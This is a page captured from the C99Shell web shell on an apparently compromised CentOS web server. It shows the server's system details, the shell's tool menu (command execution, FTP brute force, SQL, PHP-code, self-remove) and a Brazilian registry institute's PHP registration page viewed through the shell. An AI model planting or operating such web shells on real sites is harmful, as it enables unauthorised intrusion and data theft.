!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16. PHP/5.4.16 

uname -a: Linux roko-bkp 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 

uid=48(apache) gid=48(apache) groups=48(apache),1003(webmaster) 

Safe-mode: OFF (not secure)

/var/www/html/   drwxr-xr-x
Free 9.44 GB of 93.48 GB (10.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     acessoInscricao.php (5.17 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
//inclui o template de cabecalho

include("cabecalho.php");
$title="IRPEN | Instituto de Registro Civil de Pessoas Naturais do Paraná - 2011";
$not=$_GET['not'];
?>
<script language="javascript" type="text/javascript">
function checkMail(mail){ 
        var er = new RegExp(/^[A-Za-z0-9_\-\.]+@[A-Za-z0-9_\-\.]{2,}\.[A-Za-z0-9]{2,}(\.[A-Za-z0-9])?/); 
        if(typeof(mail) == "string"){ 
                if(er.test(mail)){ return true; } 
        }else if(typeof(mail) == "object"){ 
        if(er.test(mail.value)){  
            return true;  
        } 
        }else{ 
            return false; 
        } 
}
function txtBoxFormat(objeto, sMask, evtKeyPress) {
    var i, nCount, sValue, fldLen, mskLen,bolMask, sCod, nTecla;
 
 
    if(document.all) { // Internet Explorer
        nTecla = evtKeyPress.keyCode;
    } else if(document.layers) { // Nestcape
        nTecla = evtKeyPress.which;
    } else {
        nTecla = evtKeyPress.which;
        if (nTecla == 8) {
            return true;
        }
    }
 
    sValue = objeto.value;
 
    // Limpa todos os caracteres de formatação que
    // já estiverem no campo.
    sValue = sValue.toString().replace( "-", "" );
    sValue = sValue.toString().replace( "-", "" );
    sValue = sValue.toString().replace( ".", "" );
    sValue = sValue.toString().replace( ".", "" );
    sValue = sValue.toString().replace( "/", "" );
    sValue = sValue.toString().replace( "/", "" );
    sValue = sValue.toString().replace( ":", "" );
    sValue = sValue.toString().replace( ":", "" );
    sValue = sValue.toString().replace( "(", "" );
    sValue = sValue.toString().replace( "(", "" );
    sValue = sValue.toString().replace( ")", "" );
    sValue = sValue.toString().replace( ")", "" );
    sValue = sValue.toString().replace( " ", "" );
    sValue = sValue.toString().replace( " ", "" );
    fldLen = sValue.length;
    mskLen = sMask.length;
 
    i = 0;
    nCount = 0;
    sCod = "";
    mskLen = fldLen;
 
    while (i <= mskLen) {
      bolMask = ((sMask.charAt(i) == "-") || (sMask.charAt(i) == ".") || (sMask.charAt(i) == "/") || (sMask.charAt(i) == ":"))
      bolMask = bolMask || ((sMask.charAt(i) == "(") || (sMask.charAt(i) == ")") || (sMask.charAt(i) == " "))
 
      if (bolMask) {
        sCod += sMask.charAt(i);
        mskLen++; }
      else {
        sCod += sValue.charAt(nCount);
        nCount++;
      }
 
      i++;
    }
 
    objeto.value = sCod;
 
    if (nTecla != 8) { // backspace
      if (sMask.charAt(i-1) == "9") { // apenas números...
        return ((nTecla > 47) && (nTecla < 58)); } 
      else { // qualquer caracter...
        return true;
      } 
    }
    else {
      return true;
    }
  }
    function trim(str) { 
        return str.replace(/^\s+|\s+$/g,""); 
    } 

  
    function valida_formulario() {
        
        if (trim(document.getElementById("txtNome").value) == "") {
            alert("Por favor, preencha o nome!");
            document.getElementById("txtNome").focus();
            return false;
        } else
        if (trim(document.getElementById("txtCartorio").value) == "") {
            alert("Por favor, preencha o cartorio!");
            document.getElementById("txtCartorio").focus();
            return false;
        } else 
        if (trim(document.getElementById("txtEndereco").value) == "") {
            alert("Por favor, preencha o endereco!");
            document.getElementById("txtEndereco").focus();
            return false;
        } else
        if (trim(document.getElementById("txtCidade").value) == "") {
            alert("Por favor, preencha a cidade!");
            document.getElementById("txtCidade").focus();
            return false;
        } else
        if (trim(document.getElementById("txtCep").value) == "") {
            alert("Por favor, preencha o CEP!");
            document.getElementById("txtCep").focus();
            return false;
        } else
        if (trim(document.getElementById("txtTelefone").value) == "") {
            alert("Por favor, preencha o telefone!");
            document.getElementById("txtTelefone").focus();
            return false;
        } else
        if (trim(document.getElementById("txtEmail").value) == "") {
            alert("Por favor, preencha o email!");
            document.getElementById("txtEmail").value = '';
            document.getElementById("txtEmail").focus();
            return false;
        } else
        if (!checkMail(trim(document.getElementById("txtEmail").value))) {
            alert("Por favor, digite um email valido!");
            document.getElementById("txtEmail").value = '';
            document.getElementById("txtEmail").focus();
            return false;
        }
        return true;
        
    }
</script>
        <div id="cont_geral">
            <div id="cont_esq">
                <h2 class="tit4">Inscri&Ccedil;&Atilde;o COERCI</h2>
                <br /><br />
                <!--div align="center">
                                    <a href="inscricao_congresso.php"><span class="texto"><strong><u> CLIQUE AQUI </u> E ACESSE O FORMUL&Aacute;RIO DE INSCRI&Ccedil;&Atilde;O<br><br></strong></span></a>
                                </div-->
                <div align="center"><img src="imagens/imagens_noticias/la_copreci_convite.jpg" /></div>
                    
                                <br><br>
                                <!--div align="center">
                                    <a href="inscricao_congresso.php"><span class="texto"><strong><u> CLIQUE AQUI </u> E ACESSE O FORMUL&Aacute;RIO DE INSCRI&Ccedil;&Atilde;O</strong></span></a>
                                </div-->
                    <div align="center">
                        <iframe name="recipiente" width="600" height="50" frameborder="0"></iframe>
                    </div>
</div> <!--fecha a div "cont_esq"-->

<?php
//inclui o template do menu da direita
include("menu_direita.php");

//inclui o template de rodapé
include("rodape.php");
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0032 ]--